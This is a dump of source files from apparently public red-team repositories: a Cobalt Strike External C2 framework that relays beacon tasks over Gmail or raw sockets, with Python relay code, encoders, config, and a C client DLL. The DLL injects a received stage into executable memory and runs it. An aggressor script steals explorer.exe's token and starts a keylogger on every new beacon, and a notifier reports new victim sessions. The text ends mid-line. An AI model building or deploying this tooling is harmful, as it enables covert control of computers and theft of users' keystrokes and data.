# Trick, this is actually done during sendData() 50 | 51 | # Send stager to the client 52 | if config.verbose: 53 
| print commonUtils.color("Sending stager to client") 54 | commonUtils.sendData(stager_payload, beaconId) 55 | 56 | # Rrieve the metadata we need to relay back to the server 57 | if config.verbose: 58 | print commonUtils.color("Awaiting metadata response from client") 59 | # Only one response, so this should be the first element of the array 60 | metadata = commonUtils.retrieveData(beaconId)[0] 61 | 62 | # Send the metadata frame to the external_c2 server 63 | if config.verbose: 64 | print commonUtils.color("Sending metadata to c2 server") 65 | if config.debug: 66 | print (commonUtils.color("METADATA: ", status=False, yellow=True) + "%s") % (metadata) 67 | commonUtils.sendFrameToC2(sock, metadata) 68 | 69 | # Pretend we have error handling, return 0 if everything is Gucci 70 | 71 | return 0 -------------------------------------------------------------------------------- /RhinoSecurityLabs/external_c2_framework/builds/server/establishedSession/__init__.py: -------------------------------------------------------------------------------- 1 | import config 2 | from utils import commonUtils 3 | 4 | def checkForTasks(sock): 5 | """ 6 | Poll the c2 server for new tasks 7 | """ 8 | 9 | chunk = commonUtils.recvFrameFromC2(sock) 10 | if chunk < 0: 11 | if config.debug: 12 | print (commonUtils.color("Attempted to read %d bytes from c2 server", status=False, yellow=True)) %(len(chunk)) 13 | # break # This should probably just return None or something 14 | return None 15 | else: 16 | if config.debug: 17 | if len(chunk) > 1: 18 | print (commonUtils.color("Recieved %d bytes from c2 server", status=False, yellow=True)) % (len(chunk)) 19 | else: 20 | print (commonUtils.color("Recieved empty task from c2 server", status=False, yellow=True)) 21 | if len(chunk) > 1: 22 | if config.verbose: 23 | print (commonUtils.color("Recieved new task from C2 server!") + "(%s bytes)") % (str(len(chunk))) 24 | if config.debug: 25 | print (commonUtils.color("NEW TASK: ", status=False, yellow=True) + 
"%s") % (chunk) 26 | return chunk 27 | 28 | ########## 29 | 30 | 31 | 32 | #def checkForResponse(sock): 33 | def checkForResponse(beaconId): 34 | """ 35 | Check the covert channel for a response from the client. 36 | 37 | Args: 38 | beaconId (str) - Identifier to determine which beacon we're getting 39 | a response from 40 | """ 41 | 42 | recvdResponse = commonUtils.retrieveData(beaconId) 43 | if config.debug: 44 | if len(recvdResponse) > 1: 45 | print (commonUtils.color("Recieved %d bytes from client", status=False, yellow=True)) % (len(recvdResponse)) 46 | else: 47 | print (commonUtils.color("Recieved empty response from client", status=False, yellow=True)) 48 | if len(recvdResponse) > 1: 49 | if config.verbose: 50 | print (commonUtils.color("Recieved new task from C2 server!") + "(%s bytes)") % (str(len(recvdResponse))) 51 | if config.debug: 52 | print (commonUtils.color("RESPONSE: ", status=False, yellow=True) + "%s") % (recvdResponse) 53 | 54 | 55 | return recvdResponse 56 | 57 | def relayResponse(sock, response): 58 | # Relays the response from the client to the c2 server 59 | # 'response', will have already been decoded from 'establishedSession.checkForResponse()' 60 | # -- Why is this it's own function? Because I have no idea what I'm doing 61 | if config.debug: 62 | print commonUtils.color("Relaying response to c2 server", status=False, yellow=True) 63 | commonUtils.sendFrameToC2(sock, response) 64 | 65 | def relayTask(task, beaconId): 66 | # Relays a new task from the c2 server to the client 67 | # 'task' will be encoded in the 'commonUtils.sendData()' function. 
68 | if config.debug: 69 | print commonUtils.color("Relaying task to client", status=False, yellow=True) 70 | commonUtils.sendData(task, beaconId) 71 | -------------------------------------------------------------------------------- /RhinoSecurityLabs/external_c2_framework/builds/server/utils/encoders/encoder_b64url.py: -------------------------------------------------------------------------------- 1 | import base64 2 | import urllib 3 | 4 | def encode(data): 5 | data = base64.b64encode(data) 6 | return urllib.quote_plus(data)[::-1] 7 | 8 | def decode(data): 9 | data = urllib.unquote(data[::-1]) 10 | return base64.b64decode(data) 11 | -------------------------------------------------------------------------------- /RhinoSecurityLabs/external_c2_framework/builds/server/utils/encoders/encoder_base64.py: -------------------------------------------------------------------------------- 1 | # A simple encoder module for Und3rf10w's implementation of the external_c2 spec for Cobalt Strike that simples base64 encodes/decodes . 
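import base64


def encode(data):
    """Base64-encode data for the covert channel; decode() is the inverse."""
    return base64.b64encode(data)


def decode(data):
    """Base64-decode data received from the covert channel (binascii.Error on malformed input)."""
    return base64.b64decode(data)
-------------------------------------------------------------------------------- /Und3rf10w/external_c2_framework/builds/start_externalc2.cna: --------------------------------------------------------------------------------
# Start the external_c2 server by binding to 0.0.0.0:2222
# The External C2 port carries no authentication: anything that can reach it can
# request stages and relay frames. server/config.py connects to 127.0.0.1, so when
# the Python server runs on the team server host bind "127.0.0.1" here instead, or
# firewall 2222 down to that host.
externalc2_start("0.0.0.0", 2222);
-------------------------------------------------------------------------------- /Und3rf10w/Pushover/pushover-cs: --------------------------------------------------------------------------------
#!/bin/bash
# Usage: pushover-cs TITLE MESSAGE...   (or: echo MESSAGE | pushover-cs)
# pushover.cna calls this with the event type as TITLE and the event text as MESSAGE.
# The app token / user keys configured below are secrets: keep this file owner-only
# (chmod 700) and do not commit real values.
if [[ $# -gt 0 ]]; then
    title=$1
    shift
    a="$*"
else
    # -r so backslashes in piped messages are kept literally
    read -r a
fi

# pushover APP_TOKEN USER_KEY TITLE   -- the message body is taken from $a
pushover () {
    curl -s -F "token=$1" -F "user=$2" -F "title=$3" -F "message=$a" https://api.pushover.net/1/messages.json
}

# sample pushover user config
# add a line for each user you wish to receive a message
# (the first two arguments are the Pushover application token and the recipient's
#  user key; the original sample passed "$title" "$a" there, which would have sent
#  the title as the token and the message as the user key)
# pushover "APP_TOKEN" "USER_KEY" "$title" #sample_username1
-------------------------------------------------------------------------------- /Und3rf10w/Pushover/pushover.cna: --------------------------------------------------------------------------------
# This script adds basic pushover functionality to Cobalt Strike
# Ensure that you configure the pushover users in pushover-cs, ensure it is executeable
# @Und3rf10w
#
# Every handler below hands "<title> <message>" to /usr/bin/pushover-cs through one
# helper. Event text and beacon hostnames (binfo) are attacker-influenced; as far as
# I know Sleep's exec() with a single string splits it into arguments itself rather
# than invoking a shell -- verify, and escape the text if this is ever routed via sh.

# Run pushover-cs with the given "<title> <message>" text and drain its output.
sub pushover_notify {
    $push = exec("/usr/bin/pushover-cs " . $1);
    @pushdata = readAll($push);
    closef($push);
}

on ready {
    elog("Pushover notifications are now configured");
}

on event_notify {
    pushover_notify("CS:System_Event $2 $+ : $1");
}

on event_join {
    pushover_notify("CS:User_Joined $2 $+ : $1 has joined");
}

on event_newsite {
    pushover_notify("CS:New_Site_Added $3 $+ : $1 $+ : $2 ");
}

on event_action {
    pushover_notify("CS:Action_Performed $2 $+ : < $+ $3 $+ >: $1 ");
}

on event_public {
    pushover_notify("CS:New_Message $3 $+ : < $+ $1 $+ >: $2 ");
}

on event_quit {
    pushover_notify("CS:User_Left $2 $+ : $1 has quit");
}

on beacon_initial {
    pushover_notify("CS:New_Beacon New Beacon Received - ID: $1 | Hostname: " . binfo($1, "computer"));
}

on ssh_initial {
    pushover_notify("CS:New_SSH New SSH Session Received - ID: $1 | Hostname " . binfo($1, "computer"));
}
-------------------------------------------------------------------------------- /Und3rf10w/auto-keylogger.cna: --------------------------------------------------------------------------------
# Look up explorer.exe in the beacon's process list and call $callback with
# (beacon id, pid, arch) for every instance found (one per logged-on session).
sub getexplorerpid {
    bps($1, lambda({
        local('$entry $name $ppid $pid $arch');
        foreach $entry (split("\n", $2)) {
            # columns as this script has always read them: name ppid pid arch ...
            # (a whitespace split would mangle names containing spaces; explorer.exe has none)
            ($name, $ppid, $pid, $arch) = split("\\s+", $entry);
            println($entry);
            if ($name eq "explorer.exe") {
                # $1 is our Beacon ID, $pid is the PID of explorer.exe
                [$callback: $1, $pid, $arch];
            }
        }
    }, $callback => $2));
}


# Fires on every new Beacon (including re-spawns on an already-logged host):
# steals explorer's token and starts the keylogger inside explorer.exe.
on beacon_initial {
    getexplorerpid($1, {
        bsteal_token($1, int($2));
        # inject with explorer's own architecture; the original hard-coded "x64",
        # which cannot work against an x86 explorer.exe
        bkeylogger($1, int($2), $3);
    });
    blog($1, "Automatic keylogger activated");
    bnote($1, "Auto-keylogger");
}
-------------------------------------------------------------------------------- /Und3rf10w/external_c2_framework/builds/client/gmail/c2file_dll.c: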
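--------------------------------------------------------------------------------
/* a quick-client for Cobalt Strike's External C2 server based on code from @armitagehacker */
/* NOTE(review): the header names were lost in extraction; these are the ones the
 * code below needs (Win32 API, printf, memcpy). */
#include <windows.h>
#include <stdio.h>
#include <string.h>
#define PAYLOAD_MAX_SIZE 512 * 1024
#define BUFFER_MAX_SIZE 1024 * 1024
/* how long start_beacon() keeps retrying the Beacon pipe before giving up */
#define PIPE_CONNECT_TIMEOUT_MS 60000
#define PIPE_CONNECT_RETRY_MS 100


/* read a frame from a handle: a 4-byte length followed by that many bytes.
 *
 * Returns the number of payload bytes placed in buffer. Returns 0 when the
 * length could not be read, when the announced length exceeds max (the
 * caller's buffer size -- the original never checked it, so a peer announcing
 * a large length wrote past the end of buffer), or when ReadFile fails or
 * hits end-of-stream mid-frame (the original kept looping, sleeping 3 s per
 * pass, on a dead handle). A genuinely empty frame also returns 0. */
DWORD read_frame(HANDLE my_handle, char * buffer, DWORD max) {
    DWORD size = 0, temp = 0, total = 0;

    /* read the 4-byte length */
    if (!ReadFile(my_handle, (char *) &size, 4, &temp, NULL) || temp != 4) {
        return 0;
    }
    /* refuse frames the caller's buffer cannot hold */
    if (size > max) {
        return 0;
    }

    /* read the whole thing in */
    while (total < size) {
        // xychix added 1 line (throttle between partial reads; kept as-is)
        Sleep(3000);
        temp = 0;
        if (!ReadFile(my_handle, buffer + total, size - total, &temp, NULL) || temp == 0) {
            /* error or EOF: give up instead of spinning forever */
            return 0;
        }
        total += temp;
    }
    return size;
}

/* write a frame to a handle: the 4-byte length, then the payload.
 *
 * Returns the result of the payload WriteFile (non-zero on success), as before;
 * returns 0 without writing the payload if the length prefix could not be
 * written, so a failed header does not leave a half frame on the pipe.
 * The original debug printf used "%s" on buffer, which holds binary frame data
 * with no NUL terminator: it read past the frame and dumped the payload to
 * stdout. Only the length is printed now. */
DWORD write_frame(HANDLE my_handle, char * buffer, DWORD length) {
    DWORD wrote = 0;
    printf("in write_frame we have: %lu bytes\n", (unsigned long) length);
    if (!WriteFile(my_handle, (void *) &length, 4, &wrote, NULL) || wrote != 4) {
        return 0;
    }
    return WriteFile(my_handle, buffer, length, &wrote, NULL);
}

/* inject the stage into this process, run it on a new thread and open the
 * Beacon named pipe.
 *
 * Returns the pipe handle, or INVALID_HANDLE_VALUE when payload is empty, the
 * RWX allocation or thread creation fails (the original dereferenced a NULL
 * VirtualAlloc result), or the pipe does not appear within
 * PIPE_CONNECT_TIMEOUT_MS (the original busy-looped forever). The pipe name
 * is fixed here and must match C2_PIPE_NAME in server/config.py. */
HANDLE start_beacon(char * payload, unsigned int pylen) {
    DWORD length = (DWORD) pylen;
    DWORD waited = 0;
    HANDLE thread = NULL;
    HANDLE handle_beacon = INVALID_HANDLE_VALUE;
    char * payloadE = NULL;

    if (payload == NULL || length == 0) {
        return INVALID_HANDLE_VALUE;
    }

    /* inject the payload stage into the current process */
    payloadE = VirtualAlloc(0, length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (payloadE == NULL) {
        return INVALID_HANDLE_VALUE;
    }
    memcpy(payloadE, payload, length);
    printf("Injecting Code, %lu bytes\n", (unsigned long) length);
    thread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE) payloadE, (LPVOID) NULL, 0, NULL);
    if (thread == NULL) {
        VirtualFree(payloadE, 0, MEM_RELEASE);
        return INVALID_HANDLE_VALUE;
    }
    CloseHandle(thread); /* the stage keeps running; we only drop our handle */

    /* connect to our Beacon named pipe; the stage needs a moment to create it,
     * so retry with a short sleep rather than spinning */
    while (handle_beacon == INVALID_HANDLE_VALUE && waited < PIPE_CONNECT_TIMEOUT_MS) {
        handle_beacon = CreateFileA("\\\\.\\pipe\\foobar",
            GENERIC_READ | GENERIC_WRITE,
            0, NULL, OPEN_EXISTING, SECURITY_SQOS_PRESENT | SECURITY_ANONYMOUS, NULL);
        if (handle_beacon == INVALID_HANDLE_VALUE) {
            Sleep(PIPE_CONNECT_RETRY_MS);
            waited += PIPE_CONNECT_RETRY_MS;
        }
    }
    return handle_beacon;
}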
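-------------------------------------------------------------------------------- /Und3rf10w/external_c2_framework/builds/client/gmail/c2file_dll.h: --------------------------------------------------------------------------------
#ifndef c2file_H__
#define c2file_H__

#include <windows.h>

/* Prototypes for c2file_dll.c. The original lines lacked the terminating ';'
 * (so the header could not be included) and disagreed with the definitions:
 * write_frame returns the DWORD result of WriteFile, and start_beacon takes
 * the stage length as unsigned int. */
DWORD read_frame(HANDLE my_handle, char * buffer, DWORD max);
DWORD write_frame(HANDLE my_handle, char * buffer, DWORD length);
HANDLE start_beacon(char * payload, unsigned int pylen);

#endif
-------------------------------------------------------------------------------- /Und3rf10w/external_c2_framework/builds/client/gmail/compile_dll.sh: --------------------------------------------------------------------------------
#!/bin/bash
# Cross-compile the client as a 32-bit DLL (server/config.py stages an "x86" Beacon).
i686-w64-mingw32-gcc -shared c2file_dll.c -o c2file.dll
-------------------------------------------------------------------------------- /Und3rf10w/external_c2_framework/builds/client/raw_socket/c2file_dll.c: --------------------------------------------------------------------------------
/* a quick-client for Cobalt Strike's External C2 server based on code from @armitagehacker */
/* NOTE(review): the header names were lost in extraction; these are the ones the
 * code below needs (Win32 API, printf, memcpy). */
#include <windows.h>
#include <stdio.h>
#include <string.h>
#define PAYLOAD_MAX_SIZE 512 * 1024
#define BUFFER_MAX_SIZE 1024 * 1024
/* how long start_beacon() keeps retrying the Beacon pipe before giving up */
#define PIPE_CONNECT_TIMEOUT_MS 60000
#define PIPE_CONNECT_RETRY_MS 100


/* read a frame from a handle: a 4-byte length followed by that many bytes.
 *
 * Returns the number of payload bytes placed in buffer. Returns 0 when the
 * length could not be read, when the announced length exceeds max (the
 * caller's buffer size -- the original never checked it, so a peer announcing
 * a large length wrote past the end of buffer), or when ReadFile fails or
 * hits end-of-stream mid-frame (the original kept looping, sleeping 3 s per
 * pass, on a dead handle). A genuinely empty frame also returns 0. */
DWORD read_frame(HANDLE my_handle, char * buffer, DWORD max) {
    DWORD size = 0, temp = 0, total = 0;

    /* read the 4-byte length */
    if (!ReadFile(my_handle, (char *) &size, 4, &temp, NULL) || temp != 4) {
        return 0;
    }
    /* refuse frames the caller's buffer cannot hold */
    if (size > max) {
        return 0;
    }

    /* read the whole thing in */
    while (total < size) {
        // xychix added 1 line (throttle between partial reads; kept as-is)
        Sleep(3000);
        temp = 0;
        if (!ReadFile(my_handle, buffer + total, size - total, &temp, NULL) || temp == 0) {
            /* error or EOF: give up instead of spinning forever */
            return 0;
        }
        total += temp;
    }
    return size;
}

/* write a frame to a handle: the 4-byte length, then the payload.
 *
 * Returns the result of the payload WriteFile (non-zero on success), as before;
 * returns 0 without writing the payload if the length prefix could not be
 * written, so a failed header does not leave a half frame on the socket.
 * The original debug printf used "%s" on buffer, which holds binary frame data
 * with no NUL terminator: it read past the frame and dumped the payload to
 * stdout. Only the length is printed now. */
DWORD write_frame(HANDLE my_handle, char * buffer, DWORD length) {
    DWORD wrote = 0;
    printf("in write_frame we have: %lu bytes\n", (unsigned long) length);
    if (!WriteFile(my_handle, (void *) &length, 4, &wrote, NULL) || wrote != 4) {
        return 0;
    }
    return WriteFile(my_handle, buffer, length, &wrote, NULL);
}

/* inject the stage into this process, run it on a new thread and open the
 * Beacon named pipe.
 *
 * Returns the pipe handle, or INVALID_HANDLE_VALUE when payload is empty, the
 * RWX allocation or thread creation fails (the original dereferenced a NULL
 * VirtualAlloc result), or the pipe does not appear within
 * PIPE_CONNECT_TIMEOUT_MS (the original busy-looped forever). The pipe name
 * is fixed here and must match C2_PIPE_NAME in server/config.py. */
HANDLE start_beacon(char * payload, unsigned int pylen) {
    DWORD length = (DWORD) pylen;
    DWORD waited = 0;
    HANDLE thread = NULL;
    HANDLE handle_beacon = INVALID_HANDLE_VALUE;
    char * payloadE = NULL;

    if (payload == NULL || length == 0) {
        return INVALID_HANDLE_VALUE;
    }

    /* inject the payload stage into the current process */
    payloadE = VirtualAlloc(0, length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (payloadE == NULL) {
        return INVALID_HANDLE_VALUE;
    }
    memcpy(payloadE, payload, length);
    printf("Injecting Code, %lu bytes\n", (unsigned long) length);
    thread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE) payloadE, (LPVOID) NULL, 0, NULL);
    if (thread == NULL) {
        VirtualFree(payloadE, 0, MEM_RELEASE);
        return INVALID_HANDLE_VALUE;
    }
    CloseHandle(thread); /* the stage keeps running; we only drop our handle */

    /* connect to our Beacon named pipe; the stage needs a moment to create it,
     * so retry with a short sleep rather than spinning */
    while (handle_beacon == INVALID_HANDLE_VALUE && waited < PIPE_CONNECT_TIMEOUT_MS) {
        handle_beacon = CreateFileA("\\\\.\\pipe\\foobar",
            GENERIC_READ | GENERIC_WRITE,
            0, NULL, OPEN_EXISTING, SECURITY_SQOS_PRESENT | SECURITY_ANONYMOUS, NULL);
        if (handle_beacon == INVALID_HANDLE_VALUE) {
            Sleep(PIPE_CONNECT_RETRY_MS);
            waited += PIPE_CONNECT_RETRY_MS;
        }
    }
    return handle_beacon;
}
-------------------------------------------------------------------------------- /Und3rf10w/external_c2_framework/builds/client/raw_socket/c2file_dll.h: --------------------------------------------------------------------------------
#ifndef c2file_H__
#define c2file_H__

#include <windows.h>

/* Prototypes for c2file_dll.c. The original lines lacked the terminating ';'
 * (so the header could not be included) and disagreed with the definitions:
 * write_frame returns the DWORD result of WriteFile, and start_beacon takes
 * the stage length as unsigned int. */
DWORD read_frame(HANDLE my_handle, char * buffer, DWORD max);
DWORD write_frame(HANDLE my_handle, char * buffer, DWORD length);
HANDLE start_beacon(char * payload, unsigned int pylen);

#endif
-------------------------------------------------------------------------------- /Und3rf10w/external_c2_framework/builds/client/raw_socket/compile_dll.sh: --------------------------------------------------------------------------------
#!/bin/bash
# Cross-compile the client as a 32-bit DLL (server/config.py stages an "x86" Beacon).
i686-w64-mingw32-gcc -shared c2file_dll.c -o c2file.dll
-------------------------------------------------------------------------------- /Und3rf10w/external_c2_framework/builds/server/config.py: --------------------------------------------------------------------------------
# TODO: Have a proper function that reads in a config

# DEBUG: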
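############################################
############################################
# Address of External c2 server (the Cobalt Strike team server running
# externalc2_start). start_externalc2.cna binds it on 0.0.0.0:2222 and the
# External C2 port carries no authentication, so keep this on loopback (run
# this server on the team server host) or firewall the port down to this host.
EXTERNAL_C2_ADDR = "127.0.0.1"

# Port of external c2 server (kept as a string; commonUtils.createSocket() int()s it)
EXTERNAL_C2_PORT = "2222"

# The name of the pipe that the beacon should use. The client DLL opens
# "\\\\.\\pipe\\foobar" by name in c2file_dll.c, so change both together.
C2_PIPE_NAME = "foobar"

# A time in milliseconds that indicates how long the External C2 server should block when no new tasks are available
C2_BLOCK_TIME = 100

# Desired Architecture of the Beacon (compile_dll.sh builds a 32-bit client, so
# presumably only "x86" works with the shipped client -- confirm before changing)
C2_ARCH = "x86"

# How long to wait (in seconds) before polling the server for new tasks/responses
IDLE_TIME = 5

# Module names under utils/encoders and utils/transports, resolved by
# commonUtils.importModule(); plain module identifiers, not paths.
ENCODER_MODULE = "encoder_b64url"
TRANSPORT_MODULE = "transport_gmail"

###########################################
# DEBUG:

# Anything taken in from argparse that you want to make avaialable goes here:
verbose = False
debug = False
-------------------------------------------------------------------------------- /Und3rf10w/external_c2_framework/builds/server/configureStage/__init__.py: --------------------------------------------------------------------------------
import config
from utils import commonUtils


def configureOptions(sock, arch, pipename, block):
    """
    Send the stage options to the external_c2 server, one 'key=value' frame each.

    The frames go out in the order arch, pipename, block, exactly as before;
    the options now live in a table (the refactor the original's comment asked
    for) so further beacon options can be appended without more copy-paste.
    """
    if config.verbose:
        print(commonUtils.color("Configuring stager options"))

    options = (
        ("arch", arch),
        ("pipename", pipename),
        ("block", block),
    )
    for key, value in options:
        frame = key + "=" + str(value)
        if config.debug:
            print(commonUtils.color(frame, status=False, yellow=True))
        commonUtils.sendFrameToC2(sock, frame)


def requestStager(sock):
    """
    Send 'go' and return the stage frame the external_c2 server answers with.

    Returns whatever commonUtils.recvFrameFromC2() returns; loadStager()
    treats anything that is not a non-empty string as 'no stager'.
    """
    commonUtils.sendFrameToC2(sock, "go")
    return commonUtils.recvFrameFromC2(sock)


def loadStager(sock):
    """
    Run the staging handshake: options -> 'go' -> stage -> client -> metadata -> server.

    Returns 0 on success and 1 when the external_c2 server returned no stage
    (the original returned 0 unconditionally and would have pushed an empty
    stage to the client).
    """
    # Send options to the external_c2 server
    configureOptions(sock, config.C2_ARCH, config.C2_PIPE_NAME, config.C2_BLOCK_TIME)

    if config.debug:
        print(commonUtils.color("stager configured, sending 'go'", status=False, yellow=True))

    # Request stager. recvFrameFromC2() is not shown here and establishedSession
    # compares its result with 0, so a non-string error value is possible too.
    stager_payload = requestStager(sock)
    if not isinstance(stager_payload, (str, bytes)) or not stager_payload:
        print(commonUtils.color("No stager received from c2 server", status=False, yellow=True))
        return 1

    if config.debug:
        # dumps the raw stage bytes to the terminal
        print((commonUtils.color("STAGER: ", status=False, yellow=True) + "%s") % (stager_payload))

    # Prep stager payload: the encoding itself happens inside sendData()
    if config.verbose:
        print(commonUtils.color("Encoding stager payload"))

    # Send stager to the client
    if config.verbose:
        print(commonUtils.color("Sending stager to client"))
    commonUtils.sendData(stager_payload)

    # Retrieve the metadata we need to relay back to the server
    if config.verbose:
        print(commonUtils.color("Awaiting metadata response from client"))
    metadata = commonUtils.retrieveData()

    # Send the metadata frame to the external_c2 server
    if config.verbose:
        print(commonUtils.color("Sending metadata to c2 server"))
    if config.debug:
        print((commonUtils.color("METADATA: ", status=False, yellow=True) + "%s") % (metadata))
    commonUtils.sendFrameToC2(sock, metadata)

    return 0
-------------------------------------------------------------------------------- /Und3rf10w/external_c2_framework/builds/server/establishedSession/__init__.py: --------------------------------------------------------------------------------
import config
from utils import commonUtils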
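def checkForTasks(sock):
    """
    Poll the c2 server for new tasks.

    Returns the task frame when the server sent one, or None when there was
    nothing to relay or the read failed. A frame of 0 or 1 bytes counts as
    "no task" -- that threshold is inherited; confirm against the external C2
    frame format if 1-byte tasks can ever occur.
    """
    chunk = commonUtils.recvFrameFromC2(sock)

    # recvFrameFromC2() is not shown here. The original compared the result
    # with 0 -- never true for a str in Python 2, a TypeError in Python 3 --
    # and then called len() on the number in the debug print. Treat None or a
    # negative int as a failed read without touching len().
    if chunk is None or (isinstance(chunk, int) and chunk < 0):
        if config.debug:
            print(commonUtils.color("Failed to read a frame from c2 server", status=False, yellow=True))
        return None

    if config.debug:
        if len(chunk) > 1:
            print(commonUtils.color("Recieved %d bytes from c2 server", status=False, yellow=True) % (len(chunk)))
        else:
            print(commonUtils.color("Recieved empty task from c2 server", status=False, yellow=True))

    if len(chunk) > 1:
        if config.verbose:
            print((commonUtils.color("Recieved new task from C2 server!") + "(%s bytes)") % (str(len(chunk))))
        if config.debug:
            print((commonUtils.color("NEW TASK: ", status=False, yellow=True) + "%s") % (chunk))
        return chunk
    return None

##########


def checkForResponse():
    """
    Check the covert channel for a response from the client.

    Returns whatever commonUtils.retrieveData() returns (already decoded, per
    relayResponse()), even when it is empty; callers decide whether to relay it.
    """
    recvdResponse = commonUtils.retrieveData()
    if config.debug:
        if len(recvdResponse) > 1:
            print(commonUtils.color("Recieved %d bytes from client", status=False, yellow=True) % (len(recvdResponse)))
        else:
            print(commonUtils.color("Recieved empty response from client", status=False, yellow=True))
    if len(recvdResponse) > 1:
        if config.verbose:
            # the original reused the "new task from C2 server" text here and
            # mislabelled client responses in the log
            print((commonUtils.color("Recieved new response from client!") + "(%s bytes)") % (str(len(recvdResponse))))
        if config.debug:
            print((commonUtils.color("RESPONSE: ", status=False, yellow=True) + "%s") % (recvdResponse))

    return recvdResponse


def relayResponse(sock, response):
    """
    Relay a client response to the c2 server as one frame.

    'response' has already been decoded by checkForResponse() and is handed to
    commonUtils.sendFrameToC2() unchanged.
    """
    if config.debug:
        print(commonUtils.color("Relaying response to c2 server", status=False, yellow=True))
    commonUtils.sendFrameToC2(sock, response)


def relayTask(task):
    """
    Relay a new task from the c2 server to the client over the covert channel.

    'task' is encoded inside commonUtils.sendData().
    """
    if config.debug:
        print(commonUtils.color("Relaying task to client", status=False, yellow=True))
    commonUtils.sendData(task)
-------------------------------------------------------------------------------- /Und3rf10w/external_c2_framework/builds/server/utils/commonUtils.py: --------------------------------------------------------------------------------
import importlib
import socket
import struct

import config


def importModule(modName, modType):
    """
    Import utils.<modType>s.<modName> and bind it to this module's global
    <modType>, so the rest of the module can call encoder.X() / transport.X().

    modType is "encoder" or "transport"; modName comes from config
    (ENCODER_MODULE / TRANSPORT_MODULE). The original assembled an import
    statement from these strings and exec()'d it in globals(); importlib makes
    the same binding without evaluating config-derived text as code.
    """
    globals()[modType] = importlib.import_module("utils." + modType + "s." + modName)


def createSocket():
    """
    Open a TCP connection to the external_c2 server from config and return the socket.

    Borrowed from https://github.com/outflanknl/external_c2/blob/master/python_c2ex.py
    (the unused 'state' bookkeeping dict is gone). No timeout is set, so reads
    block until the server answers; the External C2 port is unauthenticated, so
    the server should only be reachable from this host.
    """
    return socket.create_connection((config.EXTERNAL_C2_ADDR, int(config.EXTERNAL_C2_PORT)))


def sendFrameToC2(sock, chunk):
    slen = struct.pack('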